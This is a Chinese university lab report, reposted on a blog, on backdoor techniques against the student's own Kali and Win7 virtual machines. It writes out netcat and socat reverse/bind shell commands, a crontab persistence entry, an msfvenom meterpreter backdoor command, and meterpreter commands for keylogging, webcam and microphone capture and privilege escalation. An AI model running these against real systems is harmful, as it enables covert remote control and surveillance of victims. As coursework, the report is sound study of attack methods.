20155313 杨瀚 《网络对抗技术》实验二 后门原理与实践

最新推荐文章于 2024-09-12 22:54:45 发布
最新推荐文章于 2024-09-12 22:54:45 发布
阅读量152 收藏 1
点赞数
文章标签: shell 运维 操作系统
原文链接:http://www.cnblogs.com/bonsai/p/8672288.html
版权

Exp2 后门原理与实践

一、实验内容

  • 1.使用netcat获取主机操作Shell,cron启动 (0.5分)

  • 2.使用socat获取主机操作Shell, 任务计划启动 (0.5分)

  • 3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)

  • 4.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)

  • 5.可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell(1分)加分内容一并写入本实验报告。

二、实验过程

第一阶段

  • 1.首先我们将从码云上下载的necat压缩包拷入win7的虚拟机中,同时也把rar的安装包拷进去用来解压缩necat。然后将necat解压缩在桌面,做好准备工作。

  • 2.接着我们打开cmd通过ipconfig查看win7的IP地址,同时也使用ifconfig在kali虚拟机中查看IP地址。
    1071530-20180329204150736-673156419.png
    1071530-20180329204247091-84655184.png

  • 3.然后我们在win7上的ncat目录中启用necat的指令ncat.exe -l -p 5313打开本地的监听端口,让kali傻乎乎地通过nc 172.20.10.7 5313 -e /bin/sh连进来,然后获得kali的操作shell。
    1071530-20180329204234302-1932802834.png
    1071530-20180329204227577-840772173.png

  • 4.当然kali也不傻,也可以通过打开监听端口nc -l -p 5313让win7傻乎乎地连进来,然后获取对方的操作shell。(所以说这是一个谁傻乎乎谁被操控的操作?)
    1071530-20180329204257272-1577660675.png
    1071530-20180329204301979-1018864501.png

  • 5.同时kali和win7也可以通过necat这个指令进行文字传输,所以这也是之后的后门程序传输的通道。(所以不要随便和小姐姐聊天不然说不定你就被传后门了)
    1071530-20180329204339638-712158220.png
    1071530-20180329204342228-2092192899.png

  • 6.接下来我们要通过crontab这个指令进行周期性即定时的执行我们刚才所做的傻乎乎操作。我们通过man crontab查看crontab的使用指南,然后看了一圈看不懂就去百度最后了解了它的用法。
    1071530-20180329204350131-522595669.png

  • 7.我们使用crontab指令的-e参数,即edit(编辑)来修改我们需要它周期性执行的时间。通过在最后一行添加1 * * * * /bin/netcat 172.20.10.7 5313 -e /bin/sh,我把时间改成1,即每小时的01分钟的时候,kali会定期傻乎乎地连接win7的5313端口,然后被人家获取操作shell。
    1071530-20180329204402629-1353943461.png
    1071530-20180329204411004-1491490010.png

第二阶段:

  • 1.傻乎乎完毕了以后我们开始使用socat这个比necat更高级的传输指令。同样先将socat压缩包拷入解压缩。

  • 2.socat高级的其中之一的原因就是它可以通过触发器来运行,即我们可以将它填入进程的触发脚本中,我们在某一项操作过后它可以自动触发运行。我们通过以下的设置,将它设置为打开锁定win7的时候进行触发,其中在脚本一栏选择我们刚才解压缩的socat.exe可执行文件,在参数一栏填入tcp-listen:5313 exec:cmd.exe,pty,stderr。当我们通过打开休眠的计算机的时候它就启动了。
    1071530-20180329204623899-553848278.png
    1071530-20180329204626460-1789445861.png
    1071530-20180329204632384-891300389.png
    1071530-20180329204931070-721828130.png

  • 3.在kali端我们使用socat - tcp:172.20.10.7:5313就可以在每个小时的01分钟的时候获取win7的cmd shell。(开始高端起来了)
    1071530-20180329204953300-298056163.png

第三阶段:

  • 1.首先我们使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.20.10.6 LPORT=5313 -f exe > 20155313_backdoor.exe指令生成一个主机地址为172.20.10.6,端口号为5313的后门程序。
    1071530-20180329205005076-1973112718.png

  • 2.通过之前的necat传输(就是刚才聊天的那个命令),将这个后门程序传输到win7上。
    1071530-20180329205013011-1930756923.png
    1071530-20180329205015713-512227477.png

  • 3.在kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口。设置完成以后就可以开始进行监听。
    1071530-20180329205035982-54530634.png
    1071530-20180329205049961-822067924.png
    1071530-20180329205055153-38067695.png

  • 4.这时候win7的用户有意无意的打开了刚才传送来的后门程序,此时的kali上已经获得了win7主机的连接,且获得了远程控制的shell(不只是刚才的cmd shell)。
    1071530-20180329205104451-1430292212.png
    1071530-20180329205112566-1510545088.png

  • 5.此时我们可以通过record_mic指令来获得win7端的音频;可以通过webcam_snap来获得摄像头拍的照片;可以通过webcam stream来进行录制视频;可以通过screenshot来获得win7端的截屏;可以通过keyscan_start指令开始记录下击键的过程,然后再使用keyscan_dump指令读取击键的记录;甚至可以使用getuid指令查看当前用户,并且使用getsystem指令提升远程控制的权限!
    1071530-20180329205118681-148326483.png
    1071530-20180329205125267-1645206713.png
    1071530-20180329210243713-632350903.png

实验中出现的问题:

  • 1.我们在进行提权操作的时候出现以下的问题:命名管道模拟?
    1071530-20180329205530073-873140568.png

  • 2.参考网上查阅到的解决方案,我们选择绕过UAC,再进行一次msf控制台的设置,然后在进入监听模式。然而结果令人大失所望,连监听模式都进不去了,显示错误是:没有建立会话?
    1071530-20180329205838986-1596177048.png

  • 3.带着烦躁的心情,我们重新观察一下之前background的返回参数,看到了session好像是5?于是将之前的session 1改成了session 5。带着不平静的心情我们尝试进入监听模式,结果...............................成功了!一鼓作气再尝试提升远程控制端权限,结果...............................又成功了!!!最终实验圆满完成!
    1071530-20180329210232061-7598418.png

三、思考题

  • 1.例举你能想到的一个后门进入到你系统中的可能方式?

  • 2.例举你知道的后门如何启动起来(win及linux)的方式?

  • 3.Meterpreter有哪些给你映像深刻的功能?

  • 4.如何发现自己有系统有没有被安装后门?

四、实验体会

参考资料

Metasploit Run VNC on Win7/2008

转载于:https://www.cnblogs.com/bonsai/p/8672288.html

weixin_30551963
关注
批量Doc转PDF工具
12-01
批量Doc转PDF工具的工作原理通常是读取源文件,解析其内容,然后按照原始布局和样式在PDF文件中重建。这个过程可能会涉及到字体嵌入、图像处理、表格和图表的转换等复杂步骤。为了确保转换的准确性和质量,这类工具...
使用msf进行反弹shell+内网渗透
热门推荐
JSMaster01的博客
12-30 1万+
首先说明一点,反弹shell的前提是该主机能够执行我们的恶意命令 反弹shell原理与灰鸽子的原理是相似的,就是在靶机上执行一个我们msf精心构造的客户端,使靶机主动回连我们攻击机的某个端口。下面开始说明使用msf进行反弹shell的过程。 一、反弹shell: 1.首先使用msf中的msfvenom模块生成一个被控端的客户端文件。这里以Windows 64位为例,具体命令如下:“msfveno...
20155313 杨瀚网络对抗技术实验三 免杀原理实践
weixin_30613433的博客
04-10 137
Exp3 免杀原理实践 一、实践内容 1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧; 2.通过组合应用各种技术实现恶意代码免杀(如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。) 3.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与...
20155313 杨瀚网络对抗技术实验网络欺诈防范
weixin_30832143的博客
05-08 185
20155313 杨瀚网络对抗技术实验网络欺诈防范 一、实验目的 本实践的目标理解常用网络欺诈背后的原理,以提高防范意识,并提出具体防范方法。具体实践有: 1.简单应用SET工具建立冒名网站。 2.ettercap DNS spoof。 3.结合应用两种技术,用DNS spoof引导特定访问到冒名网站。 、基础问题回答 1.通常在什么场景下容易受到DNS spoof攻击...
20155313 杨瀚网络对抗技术实验八 Web基础
weixin_30615767的博客
05-12 131
20155313 杨瀚网络对抗技术实验八 Web基础 一、实验目的 1.Web前端HTML 能正常安装、启停Apache。理解HTML,理解表单,理解GET与POST方法,编写一个含有表单的HTML。 2.Web前端javascipt 理解JavaScript的基本功能,理解DOM。编写JavaScript验证用户名、密码的规则。 3.Web后端:MySQL基础:正常安装、启动M...
20155313 杨瀚网络对抗技术实验六 信息搜集与漏洞扫描
weixin_30564901的博客
05-06 161
20155313 杨瀚网络对抗技术实验六 信息搜集与漏洞扫描 一、实验目的 1.各种搜索技巧的应用 2.DNS IP注册信息的查询 3.基本的扫描技术:主机发现、端口扫描、OS及服务版本探测、具体服务的查点 4.漏洞扫描:会扫,会看报告,会查漏洞说明,会修补漏洞 实验后回答问题 1.哪些组织负责DNS,IP的管理。 2.什么是3R信息。 3.评价下扫描结果的准确性。 三...
20155313 杨瀚网络对抗技术实验九 Web安全基础
weixin_30634661的博客
05-27 168
20155313 杨瀚网络对抗技术实验九 Web安全基础 一、实验目的 本实践的目标理解常用网络攻击技术的基本原理。Webgoat实践下相关实验、基础问题回答 1.SQL注入攻击原理,如何防御 答:SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部...
20155313 杨瀚网络对抗技术实验四 恶意代码分析
weixin_30532987的博客
04-17 136
20155313 杨瀚网络对抗技术实验四 恶意代码分析 一、实验目的 1.是监控你自己系统的运行状态,看有没有可疑的程序在运行。 2.是分析一个恶意软件,就分析Exp2或Exp3中生成后门软件;分析工具尽量使用原生指令或sysinternals,systracer套件。 3.假定将来工作中你觉得自己的主机有问题,就可以用实验中的这个思路,先整个系统监控看能不能找到可疑对象,再对可...
20155313 杨瀚网络对抗技术实验五 MSF基础应用
weixin_30359021的博客
05-02 141
20155313 杨瀚网络对抗技术实验五 MSF基础应用 一、实验目的 本实验目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成: 1.一个主动攻击实践,如ms08_067; 一个针对浏览器的攻击,如ms11_050; 3.一个针对客户端的攻击,如Adobe; 4.成功应用任何一个辅助模块。 、基础问题回答 1.用自己的话解释什么是...
20155313 杨瀚网络对抗技术实验一 PC平台逆向破解(5)M
weixin_30339457的博客
03-17 148
exp1 PC平台逆向破解(5)M 一、实验内容 1.手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。 2.利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。 3.注入一个自己制作的shellcode并运行这段shellcode。 实验目的 1.运行原本不可访问的代码片段 2.强行修改程序执行流 3.以及注入运行任...
【LINUX】SHELL贪吃蛇
09-11 451
Show()#Mapdo;;;esacdone#Snakefor ((i=0;i++))doecho "*"done#Foodecho "0"dodoneMove();;;;esacArrayMovethenthenthenthenfithen。
chsh:修改默认shell
qq_38641599的博客
09-12 431
本文详细介绍 Linux chsh命令的详细用法。
【Linux取经之路】用户&权限管理
最新发布
bit_pan的博客
09-12 622
事先,我已经将home目录的权限改为777,也就是说所有用户都具有这个目录的写(w)权限,并且在该目录下,我以root的身份创建了一个名为test的文件,然后我从root切换到普通用户pcz,接着尝试删除root在home目录下创建的文件test,结果还删除的很成功!首先,我创建了一个名为test的文件,我们可以看到,test的所有者和所属组为pcz,所有者对应的权限为rw-,可读可写不可执行,所属组对应的权限为rw-,可读可写不可执行。当我们以普通用户的身份安装软件包的时,往往权限不够,需要提权。
shell脚本之双重循环(详解)
qq_71371157的博客
09-12 1872
双重循环是指在程序中嵌套使用两个循环结构,通常是嵌套使用两个for循环。双重循环可以用来遍历维数组、维矩阵等需要两个维度的数据结构,并且可以对其中的元素进行操作。双重循环的执行方式是外层循环执行一次,内层循环执行完整的循环体,然后再次回到外层循环,如此循环执行,直至外层循环完毕。在实际应用中,双重循环经常用于处理维数组或嵌套数据结构。它可以用于遍历矩阵、搜索匹配项、计算累加值等等。双重循环的效率可能会比较低,因为它需要执行更多的迭代。因此,在设计算法时,需要权衡迭代次数和执行时间。执行示例。
简单说说关于shell中zsh和bash的选择
一捌柒的博客
09-10 865
Shell 是一种命令行界面(CLI),允许用户与操作系统进行交互。和是两种流行的 Unix shell,它们各自提供了强大的功能和灵活性,以满足不同用户的需求和偏好。说的简单一些,就是我们在shell中写一些函数,以及各种脚本代码来实现和操作的系统的交互;
Shell入门
R_conqueror的博客
09-10 237
在Linux中,所有进程的都默认有3各文件描述符,0 标准输入 1标准输出 2标准错误输出。将原有终端中输入和输出的地方定向到其他的地方。
shell的使用sed处理数据
码不停歇的博客
09-10 473
echo ‘|AUTOCLAIM|CE_AUTOCHECK_RESULT|ERROR_MESSAGE|VARCHAR2|3000|Y|异常信息|8|(null)|’ | sed -r ‘s#^|##g’|FLAG|AUTOCLAIM|CE_AUTOCHECK_RESULT|ERROR_MESSAGE|VARCHAR2|3000|Y|异常信息|8|(null)||FLAG|AUTOCLAIM|CE_AUTOCHECK_RESULT|SEND_DATE|DATE|7|Y|发送时间|10|(null)|
DOS脚本分析
YJlio的博客
09-11 307
S-1-5-19是本地服务帐户的安全标识符(SID),通常用于判断是否有足够的权限。:该行命令生成一个VBScript文件,通过Shell对象以管理员权限重新运行当前批处理文件(%~f0表示当前脚本的完整路径,runas表示以管理员权限运行)。else:如果ping失败(即网络连接中断状态),则显示提示信息并进入pause,等待用户按键,然后重新检查网络连接。ping *** >nul:通过ping命令检测指定服务器(***)是否有效。||: 表示如果前面的命令失败,则执行后面的部分。
DolphinScheduler应用实战笔记
qq_40623672的博客
09-10 899
DolphinScheduler(后文简称DS)在项目中的应用实战笔记,包含DS执行SQL或存储过程、DS调用DataX同步数据、DS调用HTTP接口
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值